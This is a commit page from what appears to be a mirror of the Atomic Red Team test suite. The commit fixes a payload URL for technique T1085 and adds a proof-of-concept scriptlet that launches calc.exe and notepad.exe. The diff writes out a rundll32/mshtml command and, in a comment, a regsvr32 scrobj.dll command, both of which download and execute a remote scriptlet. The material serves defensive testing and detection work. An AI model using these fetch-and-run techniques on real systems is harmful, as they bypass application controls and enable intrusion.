security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #258 from redcanaryco/fix-deadlink-cs

Browse Source 
Fix deadlink cs
This commit is contained in:
caseysmithrc
2018-06-20 12:39:10 -06:00
committed by GitHub
parent a788f38225 b9d0011c6c
commit 03ec6e8014
3 changed files with 48 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1085/T1085.md
+2 -2
View File
@@ -36,10 +36,10 @@ Test execution of a remote script using rundll32.exe
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_url | location of the payload | Url | hhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct|
| file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct|
#### Run it with `command_prompt`!
```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}")"
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"
```
<br/>
atomics/T1085/T1085.sct
+44
View File
@@ -0,0 +1,44 @@
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
<!-- DFIR -->
<!-- .sct files are downloaded and executed from a path like this -->
<!-- Though, the name and extension are arbitary.. -->
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
<public>
<method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
function Exec()
{
var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
}
]]>
</script>
</scriptlet>
atomics/T1085/T1085.yaml
+2 -2
View File
@@ -11,8 +11,8 @@ atomic_tests:
file_url:
description: location of the payload
type: Url
default: hhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct
executor:
name: command_prompt
command: |
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}")"
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"